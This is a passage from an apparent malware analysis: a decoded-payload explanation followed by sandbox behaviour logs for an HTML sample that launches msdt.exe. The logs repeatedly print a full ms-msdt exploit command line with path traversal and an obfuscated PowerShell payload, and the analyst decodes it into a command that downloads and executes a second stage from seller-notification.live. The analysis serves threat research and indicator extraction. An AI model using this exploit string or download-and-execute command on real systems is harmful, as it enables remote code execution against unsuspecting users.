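        print(f"{key}: {value}")
```

Run stand-alone, it reports two Invoke-Expression layers, the reconstructed expression [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")), and the recovered command: Get-Process -Name msdt|Stop-Process;powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://seller-notification.live/Zgfbe234dg')". The first statement kills the troubleshooter window so the user sees nothing; the second fetches and executes a second stage from seller-notification.live, which is the indicator to pivot on. The report contains no trace of that second stage (the sandbox run shows only the Chrome and msdt process trees), so the analysis of the sample ends at the download URL.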
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Process created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6299CFF5-1458.pma Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmp Jump to behavior
Source: classification engine Classification label: mal56.expl.winHTML@35/121@3/5
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Mutant created: \BaseNamedObjects\Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C71209 LoadResource,LockResource,SizeofResource, 27_2_00C71209
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe File created: C:\Program Files\Google\Chrome\ChromeRecovery Jump to behavior
Source: C:\Windows\System32\msdt.exe Automated click: Next (16 times)
Source: C:\Windows\System32\msdt.exe File opened: C:\Windows\system32\MSFTEDIT.DLL
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb` source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C939A3 push ecx; ret 27_2_00C939B6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FEA6 push ecx; ret 27_2_00C7FEB9
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection, 27_2_00C7E00C
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe File created (dropped PE file): C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C73298 GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW, 27_2_00C73298
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C802A1 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 27_2_00C802A1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Process information set: NOOPENFILEERRORBOX (4 times)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 1341
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 1519
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C9525D VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect, 27_2_00C9525D
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C898C3 FindFirstFileExW, 27_2_00C898C3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7F243 IsDebuggerPresent,OutputDebugStringW, 27_2_00C7F243
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C741A3 CreateFileW,GetFileAttributesExW,OutputDebugStringW,CloseHandle,GetLastError,WriteFile, 27_2_00C741A3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C713D8 GetProcessHeap, 27_2_00C713D8
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C83E6C mov ecx, dword ptr fs:[00000030h] 27_2_00C83E6C
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C89665 mov eax, dword ptr fs:[00000030h] 27_2_00C89665
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E2C3 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,DeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,DeleteCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection, 27_2_00C7E2C3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FE00 SetUnhandledExceptionFilter, 27_2_00C7FE00
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7F886 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 27_2_00C7F886
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8323D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_00C8323D
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E4E6 EnterCriticalSection,SetUnhandledExceptionFilter, 27_2_00C7E4E6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FC6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_00C7FC6A
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E553 SetUnhandledExceptionFilter,LeaveCriticalSection, 27_2_00C7E553
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C759D6 GetSecurityDescriptorDacl,SetSecurityDescriptorDacl, 27_2_00C759D6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C78FB3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 27_2_00C78FB3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FAC3 cpuid 27_2_00C7FAC3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C73047 GetLocalTime,GetCurrentThreadId,GetCurrentProcessId, 27_2_00C73047
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C78E0B GetVersionExW,GetProcAddress,FreeLibrary, 27_2_00C78E0B
[Legend of the contacted-IP distribution chart: No. of IPs < 25%; 25% to 50%; 50% to 75%; more than 75%]